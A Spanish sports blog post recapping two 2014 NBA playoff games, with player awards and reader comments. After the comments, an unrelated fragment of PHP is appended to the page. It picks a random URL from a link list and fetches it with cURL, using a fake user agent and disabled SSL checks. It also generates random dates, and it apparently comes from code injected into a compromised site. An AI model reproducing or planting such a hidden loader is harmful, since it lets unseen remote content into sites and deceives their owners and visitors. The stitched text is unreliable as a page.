La Crónica: Primeros finalistas

15 de May de 2014 por Simon

Ya lo avisábamos el martes en nuestra crónica de la jornada: las series de San Antonio y Miami estaban sentenciadas a falta de dar confirmar el punto final. Como se preveía, el campeón y el subcampeón vigentes no quisieron coger más aviones de la cuenta y se impusieron ayer, los Spurs lo hicieron con la superioridad que han demostrado toda la serie mientras que los Heat tuvieron que recurrir de nuevo al salvavidas Allen para no complicarse la vida.

Los Brooklyn Nets saltaron a la cancha del American Airlines Arena mentalizados para que el partido no fuera el último de la temporada. En el primer tiempo pudieron minimizar el impacto de Lebron y sólo un estratosférico Dwyane Wade era capaz de mantener a los Heat en el partido. El marcador discurría igualado hasta que en los 3 últimos minutos del segundo cuarto, un parcial de 10-0 favorable para los de Kidd, con Wade en el banco y Lebron sin aparecer,  otorgaba a los Nets la mayor ventaja del partido justo al descanso. En el tercer periodo los locales no fueron capaces de revertir la situación pues Johnson y Williams se mostraban imparables y anotaban con fluidez desde fuera. Al inicio del último cuarto, con 10 arriba para Brooklyn, empezamos a creer en la posibilidad de que la serie necesitara de un sexto encuentro pero fue en ese momento cuando apareció por fin Lebron James liderando el primer atisbo de remontada. Sin embargo, los Nets anoche se mostraron muy serios y a Joe Johnson ahora se le unía Pierce para defender la ventaja. Dos triples providenciales de Chris Bosh mantuvieron a los Heat en la pomada cuando parecía que los visitantes iban a sentenciar el partido. A falta de 3 minutos y 8 puntos abajo, Lebron James anotó un triple que abría un parcial de 12-0 que cerraría Ray Allen con unos tiros libres vitales inmediatamente después de anotar el triple de la noche que ponía por delante a los suyo a falta de 32 segundos. Un triplazo de Johnson apretaba el marcador de nuevo y un error de Lebron desde la línea de tiros libros dejaba la puerta abierta a una posible victoria de Brooklyn. Sin embargo, los Nets no cuidaron el balón y sirvieron en bandeja la victoria a los Heat (94-96). Ahora los Heat esperan rival que les puede llegar esta misma madrugada si los Pacers vencen a los Wizards en la capital de los Estados Unidos. 

Por su parte los Spurs dominaron cuando, como y de la forma que quisieron a unos impotentes Blazers que apenas han podido competir ante el saber hacer y la experiencia de los tejanos. Ayer Portland logró aguantar durante el primer cuarto pero en el segundo la oleada de suplentes y rotaciones destacó a los locales en el marcador antes del descanso. Ya en la segunda parte, un magnífico inicio de los de Popovich, con un parcial de 15-3 en los cuatro primeros minutos, dejaba el partido decidido y convertía los minutos restantes en intrascendentes (82-104). Duncan y compañía sólo tuvieron que esperar el final para poder marcharse a casa con otra clara victoria y tras no haber encontrado prácticamente rival en estas semifinales al contrario que en la durísima serie de la primera ronda . No todo fueron buenas noticias para los Spurs pues Tony Parker se marchó lesionado en el segundo cuarto y no pudo volver a jugar. Habrá que estar atentos a la evolución de la lesión pues el francés está resultando fundamental y ha llegado a los playoffs en el mejor momento de forma de la temporada.

PREMIOS

MVP: Dwyane Wade (28p) en la 1ª parte y Lebron James (29p – 5a – 9r) en la 2ª asumieron el liderazgo de su equipo en un partido dificilísimo que solo pudierno resolver en los últimos minutos. Por su parte, Kawhi Leonard (22p – 7r – 5rb) estuvo pletórico ante los Blazers tanto en ataque como en defensa.

Sorpresa: Daba igual que Ray Allen (13p) hubiera fallado los 6 triples intentados hasta el momento. Cuando hay que meterlo sabes que es el hombre adecuado. Anoche lo volvió a hacer a falta de 30 segundos. Decisivo una vez más.

Decepción: El proyecto “ganador” de los Brooklyn Nets se despide en 2ª ronda de playoffs. En ningún momento ha dado la sensación de que pudieran competir con los Miami Heat.

Esfuerzo en vano: Hemos de ser capaces de separar la calidad de Joe Johnson (34p – 7r) de su gigantesco contrato. El de los Nets demostró anoche una vez más que es un enorme jugador sobretodo en la 2ª parte en la que anotó 24 puntos con un 10 de 13 en TC.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Luis H. dice:
    #1

    Hombre, si los Nets hubiesen ganado ayer, se ponían 3-2 y el sexto en casa. Tanto como que no han dado imagen de poder competir… teniendo en cuenta que les falta Brook López, que es el máximo anotador

      Citar

  2. Jose Luis dice:
    #2

    Además han perdido dos partidos por 2-3 puntos creo. Han competido, pero les ha faltado algo. Realmente solo ganaron un partido.

      Citar

  3. rumbero dice:
    #3

    Sólo he visto 3 partidos, pero quitando el día que metieron 15 triples nunca ha parecido que los Nets tuvieran opciones reales de ganar. Miami siempre ha contado con su habitual comodín de apretar en el último cuarto para rematarlos.
    Ya lo comenté no hace mucho, sin dar una excelentes sensaciones a mi me sigue pareciendo que les quedan un par de marchas por poner. Que no quiere decir que vayan sobrados pero antes estos Pacers bipolares o Wizards les debe valer para llegar otra vez a la final.

      Citar

  4. Albertis dice:
    #4

    Buenas,
    La sensación de que aunque estuvieran ocho arriba faltando poco iban a palmar ha estado presente en toda la serie y creo que la hemos percibido casi todos los que la hemos visto, pero se ha notado aún mas en este último.
    No sé que les ha faltado, imagino que un poco de todo, Deron no es ni de broma el de Utah, Garnett no hablemos, el pívot titular lesionado y la sensación de tener la moral comida, de saberse inferiores, la rotación del equipo es amplia pero la sensación de llegar a los últimos minutos con el partido igualado y que se les hace noche ha sido clara, hoy es que faltando 6 segundos y con bola para empatar o ganar no eran capaces ni de sacar de banda; de todas formas se agradece que hayan dado algo de guerra.
    Ojalá el señor Silver se iluminara y cambiara el formato de playoffs, es totalmente incoherente, si, el de toda la vida pero injusto a todas luces, que bonito hubiera sido ver un Warriors-Miami o un Indiana-San Antonio, por decir algo. Los 16 mejores a playoffs y todos contra todos!! Respetando claro está el orden de la regular.
    Un saludo y gracias a Oklahoma y Clippers por la gran serie!!!

      Citar

  5. Lucho dice:
    #5

    Que buen jugador que es Joe Jhonson

    Se lo minimiza porque se lo compara con su contrato. Pero si se lo analizara exclusivamnte como jugador, seria mucho mas valorado. Coincido

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>